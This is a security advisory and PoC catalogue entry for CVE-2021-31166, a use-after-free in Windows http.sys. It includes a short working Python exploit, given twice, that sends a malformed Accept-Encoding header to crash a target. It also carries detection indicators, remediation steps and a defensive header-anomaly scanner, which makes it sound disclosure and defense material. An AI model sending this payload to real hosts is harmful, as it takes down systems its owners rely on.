
HTTP Protocol Stack Remote Code Execution Vulnerability (CVE-2021-31166)

by Axel "0vercl0k" Souchet (PoC); vulnerability reported by @_mxms and @fzzyhd1 · 2026-05-15

CVSS:               9.8/10
Severity:           Critical
CVE:                CVE-2021-31166
Category:           network
Affected product:   Microsoft Windows HTTP Protocol Stack (http.sys)
Affected versions:  Windows Server 2004/20H2 (Server Core) and Windows 10 2004/20H2 (ARM64/x64/32-bit), per Microsoft advisory
Disclosed:          2026-05-15
Patch status:       patched

Metadata

Field                  Value
Date Added             2026-05-15
Author / Researcher    Axel "0vercl0k" Souchet (PoC); vulnerability reported by @_mxms and @fzzyhd1
CVE / Advisory         CVE-2021-31166
Category               network
Severity               Critical
CVSS Score             9.8 (CVSSv3.1)
Status                 Weaponized
Tags                   HTTP.sys, use-after-free, RCE, Windows, kernel, unauthenticated
Related                N/A

Affected Target

Field                    Value
Software / System        Microsoft Windows HTTP Protocol Stack (http.sys)
Versions Affected        Windows Server 2004/20H2 (Server Core) and Windows 10 2004/20H2 (ARM64/x64/32-bit), per Microsoft advisory
Language / Platform      Python PoC targeting Windows HTTP.sys over HTTP
Authentication Required  No
Network Access Required  Yes

Summary

CVE-2021-31166 is a remote use-after-free vulnerability in the Windows HTTP Protocol Stack (http.sys) that is reachable through crafted HTTP headers. The public PoC sends a malformed Accept-Encoding header that drives the kernel HTTP parser into unsafe list handling. Successful exploitation crashes the target system, and Microsoft's advisory rates the impact as remote code execution.


Vulnerability Details

Root Cause

The vulnerable code path in http!UlpParseContentCoding mishandles ownership of the list of parsed content-coding entries. The local list is moved into the request structure, but the stale list linkage left behind can still be freed on another path, which produces use-after-free / list corruption behavior.

Attack Vector

A remote, unauthenticated attacker sends an HTTP request containing a crafted Accept-Encoding value (for example with malformed comma-separated codings) to a Windows service that uses http.sys.

Impact

  • Remote kernel crash/denial-of-service (e.g., KERNEL_SECURITY_CHECK_FAILURE).
  • Potential remote code execution in the Windows kernel networking stack.
  • Exposure of internet-facing Windows services that rely on http.sys.

Environment / Lab Setup

OS:          Attacker on Linux/macOS/Windows with Python 3
Target:      Authorized vulnerable Windows 10/Windows Server host using HTTP.sys
Attacker:    Any host with TCP connectivity to target HTTP service
Tools:       python3, requests

Setup Steps

cd pocs/network/2026-05-15_cve-2021-31166-http-sys-uaf
python3 -m venv .venv
source .venv/bin/activate
pip install requests
python3 cve-2021-31166.py --target 192.0.2.10:80

Proof of Concept

Step-by-Step Reproduction

  1. Prepare an authorized vulnerable Windows system exposing an HTTP endpoint backed by http.sys.
  2. From an attacker machine, run the PoC with --target <ip:port>.
  3. The PoC sends a GET request with a crafted Accept-Encoding header.
  4. Observe target instability/crash in vulnerable environments.

Exploit Code

See cve-2021-31166.py in this folder.

import requests

# host:port of the HTTP.sys-backed service in the authorized lab
target = "192.0.2.10:80"

# The trailing empty codings (", ,") are the malformed part of the header.
requests.get(f"http://{target}/", headers={
    "Accept-Encoding": "doar-e, ftw, imo, ,",
})

Expected Output

<Response [400]>

Screenshots / Evidence

  • screenshots/ — add authorized lab packet capture, request trace, and crash evidence.

Detection & Indicators of Compromise

- Repeated malformed Accept-Encoding headers such as trailing empty codings
- Sudden HTTP service disruption followed by host bugcheck/reboot
- Kernel crash signatures involving HTTP!UlFreeUnknownCodingList / UlpParseAcceptEncoding

SIEM / IDS Rule (example):

Alert on inbound HTTP requests where Accept-Encoding contains malformed trailing
commas/empty coding tokens and correlate with HTTP service crashes.

Remediation

Action             Detail
Patch              Apply Microsoft May 2021 security updates for CVE-2021-31166
Workaround         Restrict exposure of HTTP.sys-backed services and filter malformed headers at edge controls
Config Hardening   Segment critical Windows hosts, enable crash monitoring, and maintain rapid patch cadence
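The detection rule in the previous section (flag Accept-Encoding values with empty coding tokens and correlate them with HTTP service crashes) and the "filter malformed headers at edge controls" workaround in the table above both come down to the same check on the header's list syntax. The following is an added example, not code from the original PoC repository: it parses Accept-Encoding values per the RFC 7230 list/token grammar, scans constructed request log lines for anomalous values, and pairs them with constructed bugcheck events on the same host within a time window. The log line format, host names, source addresses and crash feed are all assumptions made for the example.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed sample request log lines (not real captures). Each line carries the
# receiving host, a timestamp and the raw Accept-Encoding value the client sent.
SAMPLE_REQUEST_LOG = [
    '2026-05-15T10:00:01Z host=win-web-01 src=203.0.113.5 "GET / HTTP/1.1" 200 accept_encoding="gzip, deflate, br"',
    '2026-05-15T10:00:05Z host=win-web-01 src=203.0.113.7 "GET / HTTP/1.1" 400 accept_encoding="doar-e, ftw, imo, ,"',
    '2026-05-15T10:00:09Z host=win-web-02 src=203.0.113.9 "GET /a HTTP/1.1" 200 accept_encoding="identity;q=0.5, *;q=0"',
    '2026-05-15T10:05:30Z host=win-web-02 src=203.0.113.11 "GET / HTTP/1.1" 400 accept_encoding="gzip,,deflate"',
    '2026-05-15T10:07:00Z host=win-web-01 src=203.0.113.12 "GET / HTTP/1.1" 200 accept_encoding=""',
]

# Constructed host crash events, e.g. from a bugcheck/reboot feed: (host, time, bugcheck).
SAMPLE_CRASH_EVENTS = [
    ("win-web-01", "2026-05-15T10:00:12Z", "KERNEL_SECURITY_CHECK_FAILURE"),
]

# RFC 7230 tchar set: a content-coding name is one token, optionally followed by ;q=weight.
_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
_QVALUE = re.compile(r"^q=(0(\.\d{0,3})?|1(\.0{0,3})?)$")
# Assumed log layout: "<timestamp> host=<name> ... accept_encoding="<value>"".
_LINE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) .*accept_encoding="(?P<ae>[^"]*)"')


def analyze_accept_encoding(value: str) -> List[str]:
    """Return the anomalies found in an Accept-Encoding value (empty list = clean).

    An empty header value is legal (it means "identity only"). Empty list
    elements ("gzip,,deflate" or a trailing ", ,") are tolerated by RFC 7230's
    list rule, so a syntax-only validator lets them through; they are exactly
    the shape the detection rule on this page describes, so flag them here.
    """
    reasons: List[str] = []
    if value.strip() == "":
        return reasons
    for idx, element in enumerate(e.strip() for e in value.split(",")):
        if element == "":
            reasons.append(f"empty coding token at position {idx}")
            continue
        coding, *params = (p.strip() for p in element.split(";"))
        if not _TOKEN.match(coding):
            reasons.append(f"invalid coding token {coding!r} at position {idx}")
        for param in params:
            if not _QVALUE.match(param):
                reasons.append(f"invalid parameter {param!r} at position {idx}")
    return reasons


def _parse_ts(ts: str) -> datetime:
    # fromisoformat() only accepts a trailing "Z" from Python 3.11 on; normalise it.
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def scan_request_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per request whose Accept-Encoding value is anomalous."""
    findings = []
    for line in lines:
        m = _LINE.match(line)
        if not m:
            continue  # line without an Accept-Encoding field; nothing to check
        reasons = analyze_accept_encoding(m.group("ae"))
        if reasons:
            findings.append({"host": m.group("host"), "time": _parse_ts(m.group("ts")),
                             "value": m.group("ae"), "reasons": reasons})
    return findings


def correlate_with_crashes(findings, crash_events, window_seconds: int = 60) -> List[Tuple[str, str]]:
    """Pair each anomalous request with a crash on the same host inside the window.

    Returns (accept_encoding_value, bugcheck) pairs: a malformed header followed
    shortly by a bugcheck on the same host is the high-confidence signal.
    """
    window = timedelta(seconds=window_seconds)
    pairs = []
    for f in findings:
        for host, ts, bugcheck in crash_events:
            crash_time = _parse_ts(ts)
            if host == f["host"] and f["time"] <= crash_time <= f["time"] + window:
                pairs.append((f["value"], bugcheck))
    return pairs


if __name__ == "__main__":
    found = scan_request_log(SAMPLE_REQUEST_LOG)
    for f in found:
        print(f["host"], f["time"].isoformat(), repr(f["value"]), "; ".join(f["reasons"]))
    for value, bugcheck in correlate_with_crashes(found, SAMPLE_CRASH_EVENTS):
        print("CORRELATED:", repr(value), "->", bugcheck)
```

Run stand-alone it reports the two anomalous requests (the PoC header with its two trailing empty codings, and the double-comma value) and correlates the first with the bugcheck on win-web-01. The same analyze_accept_encoding() check is what an edge filter would apply before forwarding to an http.sys-backed host; an empty element is the condition to reject, while a well-formed value with q-weights passes.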

Notes

Auto-ingested from https://github.com/0vercl0k/CVE-2021-31166 on 2026-05-15.

cve-2021-31166.py
# For authorized security research and educational use only.
# Do not use against systems or networks without explicit permission.

# Axel '0vercl0k' Souchet - May 16 2021
import argparse

import requests


def main():
    # ArgumentParser's first positional parameter is `prog`; the text is a description.
    parser = argparse.ArgumentParser(
        description='PoC for CVE-2021-31166: remote UAF in HTTP.sys'
    )
    parser.add_argument('--target', required=True,
                        help='host:port of the HTTP.sys-backed service')
    args = parser.parse_args()
    # The trailing empty codings (", ,") in Accept-Encoding are the malformed part
    # of the header; the Expected Output section above lists <Response [400]>.
    r = requests.get(f'http://{args.target}/', headers={
        'Accept-Encoding': 'doar-e, ftw, imo, ,',
    })
    print(r)


if __name__ == '__main__':
    main()